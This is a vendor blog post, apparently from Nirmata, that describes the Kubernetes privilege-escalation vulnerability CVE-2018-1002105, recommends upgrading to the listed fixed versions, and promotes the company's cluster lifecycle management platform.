Proxy Request Handling Vulnerability – What does it mean for you?
Earlier this week, a major Kubernetes vulnerability was found (CVE-2018-1002105). A first for the increasingly popular and de-facto standard for container orchestration. Essentially, with a specially crafted request, users that are authorized to establish a connection through the Kubernetes API server to a backend server can then send arbitrary requests over the same connection directly to that backend, authenticated with the Kubernetes API server’s TLS credentials used to establish the backend connection.
According to the latest version of the vulnerability severity calculator, exploiting the security glitch has low difficulty and does not require user interaction. And if this vulnerability is being exploited, it is very hard to detect. A regular user with ‘exec,’ ‘attach,’ or ‘portforward’ rights over a Kubernetes pod, can escalate their privileges to cluster-admin level and execute any process in a container.
What do you need to do?
You best option is to upgrade to a fixed version as soon as possible. There are other mitigation options but upgrading is the recommended option. If you are running a CIS compliant cluster, then you are slightly better off but still vulnerable. For those who want to know how this vulnerability can be exploited, Appsecco post is a good resource. Following Kubernetes release have the fixes :-
- v1.10.11
- v1.11.5
- v1.12.3
- v1.13.0-rc.1
Community Support
This is the first major such vulnerability found with Kubernetes architecture, and it won’t be the last.
Kubernetes has the most robust community support and this was evident from how quickly the fix was made available and issue communicated once the issue was identified. There have been arguments for supported Kubernetes distribution, highlighting risk for smaller DevOps team using open source Kubernetes. The reality is that many Enterprises use open source distribution and if anything, can react faster as fixes were made available faster to the open source Kubernetes. Many public managed service providers reacted no faster than any Enterprise customer could.
Lifecycle Management of Kubernetes Clusters
While Kubernetes is delivering on the promise of driving efficiencies within the Enterprise, life-cycle management of operating clusters is a complex endeavor and can involve much undifferentiated heavy lifting that Enterprises can do without. And if you are managing these clusters at scale or different distributions – e.g. a public managed service, on-premises clusters and curated distribution, you need to work out three different upgrade strategies.
This is where a single management plane to manage life-cycle of your cluster and applications makes a lot of sense for Enterprises operating multiple clusters at scale or providing Kubernetes-as-a-Service as a central IT offering.
These are the problems Nirmata solves by providing a single management plane that takes away the complexity of operating clusters and helps IT organizations like IT Ops, development and DevOps leverage and operate Kubernetes based on the outcomes they are expected to deliver for the Enterprise.
An example of how Nirmata simplifies cluster operations is the Proxy Handling Vulnerability. Nirmata customers can upgrade their clusters with a single click by just choosing the version they want to upgrade to. Nirmata takes care of all the logistics involved in upgrading the clusters.
What Kubernetes has is a mature platform that has seen many years of production time at scale. What Enterprises need are features that make it easy for them to adopt the open source Kubernetes rather than a curated distribution.
Some Key Nirmata features for cluster and application life-cycle management that meet Enterpise requirements include –
- Ensure your application deployment across clouds and on-premises are always compliant with corporate policy requirements.
- Stream cluster events and audit trails to your central repositories.
- Automate secrets management using key managers such as Vault.
- Use change management policies to control and track the fl ow of changes from CI/CD tools to your dev-test, staging, and production environments.
- Complete visibility into cluster and workload performance with integrated monitoring and logging features.
- Granular access control for teams, applications and environments.
- Flexible, multi-level isolation policies to ensure each application’s environment is fully segmented and isolated.
- Allocate and manage resource quotas for your teams and applications.
- Continuously monitor running applications and generate alerts for unexpected conditions.
- Create custom alarms for specific conditions, metrics, or state changes. Apply proactive actions based on specific alarms and thresholds.
- Use an integrated Cloud Shell to access your cluster and containers without requiring complex VPN or SSH.
- Apply policies to ensure consistent behaviors for cluster components and workloads.
What are your use cases for Kubernetes cluster and application life-cycle management via Kubernetes architecture? Let us know!
As always, your comments and feedback are highly appreciated. Please contact us here to start a conversation.
Sorry, the comment form is closed at this time.